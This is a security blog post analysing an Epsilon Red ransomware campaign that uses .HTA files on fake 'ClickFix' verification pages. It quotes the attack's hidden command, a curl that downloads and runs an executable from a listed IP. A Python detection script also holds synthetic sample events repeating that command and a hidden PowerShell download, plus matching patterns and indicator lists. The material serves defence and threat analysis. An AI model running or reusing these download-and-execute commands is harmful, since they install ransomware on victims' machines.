Bivash Nayak

Published on: July 26, 2025

By: CyberDudeBivash Editorial Team

Website: cyberdudebivash.com


🚨 What’s Going On: .HTA-Based Ransomware Campaign Hits Windows

Recent reports describe a global ransomware campaign that tricks users into downloading malicious .HTA (HTML Application) files. Once run, the files silently install Epsilon Red ransomware while posing as benign “ClickFix” verification pages themed around platforms such as Discord, Twitch, Kick, and OnlyFans.


🔍 Attack Flow: How the Attack Works

  1. The victim lands on a fake “verification” page and clicks a button labeled “ClickFix” that appears harmless.
  2. The page delivers an .HTA file; when mshta.exe runs it, the embedded JavaScript creates an ActiveXObject (WScript.Shell).
  3. That object runs a hidden command:
    cmd /c cd /D %userprofile% && curl -s -o a.exe http://155.94.155[.]227:2269/dw/vir.exe && a.exe
  • This silently downloads and executes a.exe (Epsilon Red ransomware) with no visible window.
  • Finally, a fake verification prompt is shown:
    Your Verificatification Code Is: PC‑19fj5e9i‑cje8i3e4
    It is intended to distract the victim while the ransomware runs.


🧩 Why It’s Effective

  • Abuses legacy ActiveX support in the IE/mshta.exe engine, which is still present and enabled on many enterprise systems.
  • Bypasses browser-based defenses like SmartScreen and download warnings.
  • Minimal user interaction required beyond clicking a button.
  • Low forensic footprint at initial stages—no visible binaries or prompts until encryption starts.

🛡️ Recommended Actions to Protect Your Organization

✅ Disable ActiveX and WSH Execution

Block mshta.exe, ActiveXObject usage, and WScript.Shell via Group Policy or AppLocker.

✅ Block Known Threat Infrastructure

Block known command-and-control and download infrastructure such as:

  • 155.94.155.227:2269
  • 213.209.150.188:8112
  • related domains, including twtich[.]cc and capchabot[.]cc

✅ Harden Email and Web Filtering

  • Intercept .HTA downloads.
  • Block or sandbox suspicious fake verification pages.

✅ Monitor Suspicious Commands

Use EDR to detect WScript.Shell Run calls, hidden curl downloads, and mshta.exe spawning cmd.exe or powershell.exe in a user context.
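As an added example (not code from the CyberDudeBivash post), the following Python script shows the kind of detection logic the two sections above call for: it runs over constructed process-creation events shaped like Sysmon Event ID 1 (fields ParentImage, Image, CommandLine, User), flags a script host (mshta.exe, wscript.exe, cscript.exe) spawning a shell, a curl download-then-run pattern, hidden-window flags, and any URL host that matches the IPs and domains listed under “Block Known Threat Infrastructure”. The events are synthetic samples modelled on the chain described in the post, not real telemetry.

```python
import re

# Constructed sample events shaped like Sysmon Event ID 1 (process creation).
# Entries 0 and 3 are synthetic look-alikes of the chain described in the post;
# none of this is real telemetry.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\mshta.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c cd /D %userprofile% && curl -s -o a.exe http://155.94.155.227:2269/dw/vir.exe && a.exe",
     "User": r"CORP\jdoe"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c dir",
     "User": r"CORP\jdoe"},
    {"ParentImage": r"C:\Program Files\Git\cmd\git.exe",
     "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl -s https://example.invalid/api",
     "User": r"CORP\build"},
    {"ParentImage": r"C:\Windows\System32\mshta.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -w hidden -c "iwr http://twtich.cc/x.exe -OutFile x.exe"',
     "User": r"CORP\asmith"},
]

# Indicators taken from the post (IPs without their ports, domains un-defanged).
KNOWN_BAD_HOSTS = {"155.94.155.227", "213.209.150.188", "twtich.cc", "capchabot.cc"}

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# curl ... -o <name>.exe ... http(s)://... && <name>.exe  -> download, then run the same file
DOWNLOAD_THEN_RUN = re.compile(
    r"curl\b[^&|]*-o\s+(\S+\.exe)\b.*https?://\S+.*&&\s*\1", re.IGNORECASE)
URL_HOST = re.compile(r"https?://([A-Za-z0-9.\-]+)", re.IGNORECASE)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)


def basename(path):
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return the names of the rules an event triggers, in a fixed order."""
    hits = []
    cmd = event.get("CommandLine", "")
    if basename(event["ParentImage"]) in SCRIPT_HOSTS and basename(event["Image"]) in SHELLS:
        hits.append("script_host_spawns_shell")
    if DOWNLOAD_THEN_RUN.search(cmd):
        hits.append("download_then_run")
    if HIDDEN_WINDOW.search(cmd):
        hits.append("hidden_window")
    # Match every URL host in the command line against the published indicators.
    for host in sorted(set(URL_HOST.findall(cmd))):
        if host.lower() in KNOWN_BAD_HOSTS:
            hits.append("known_bad_host:" + host.lower())
    return hits


def triage(events):
    """Map event index -> triggered rules, keeping only events with at least one hit."""
    findings = {}
    for i, ev in enumerate(events):
        hits = evaluate(ev)
        if hits:
            findings[i] = hits
    return findings


if __name__ == "__main__":
    for i, hits in triage(SAMPLE_EVENTS).items():
        ev = SAMPLE_EVENTS[i]
        print(f"event {i} ({ev['User']}): {basename(ev['ParentImage'])} -> {basename(ev['Image'])}")
        for h in hits:
            print("   ", h)
```

The parent/child rule is the most durable of the four: it does not depend on the downloader (curl today, something else tomorrow) or on the current infrastructure, so a plain mshta.exe-spawns-shell alert will keep firing after the indicators rotate. The indicator match is worth keeping alongside it because a hit on a listed host turns a suspicious event into a confirmed one.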

✅ Train Users Against Social Engineering

Educate users not to run files from unknown sites—even pages that mimic trusted services.


🧠 Broader Implications

This campaign shows how outdated technologies like ActiveX still pose high risks. The combination of social engineering, browser exploitation, and zero‑artifact execution makes it a versatile deception tool. Attackers can deploy ransomware like Epsilon Red stealthily, even in hardened environments.

“This new method leverages trusted Windows capabilities to deliver ransomware stealthily—defenders must rethink browser attack protection holistically.”
— CyberDudeBivash Editorial

🔑 Key Takeaways

  • .HTA files embedded with JavaScript and ActiveX are launching ransomware silently.
  • Epsilon Red leverages this technique to infect systems without visible payloads until encryption occurs.
  • Blocking legacy script interfaces, monitoring mshta.exe execution, and educating users are immediate lines of defense.

💬 Join the Conversation

Have you seen suspicious .HTA activity or mshta.exe spawning hidden processes?

Share insights or experiences in the comments or tweet us at @CyberDudeBivash!


🔗 Stay Secure with CyberDudeBivash

For real-time alerts on emerging ransomware tactics, legacy attack vectors, and actionable cybersecurity strategies—subscribe to our Cyber Magazine: cyberdudebivash.com


Tags: #EpsilonRed #HTAattack #Ransomware #ActiveXExploitation #LegacySecurity #MSHTA #CyberThreatIntel #Cybersecurity #CyberDudeBivash


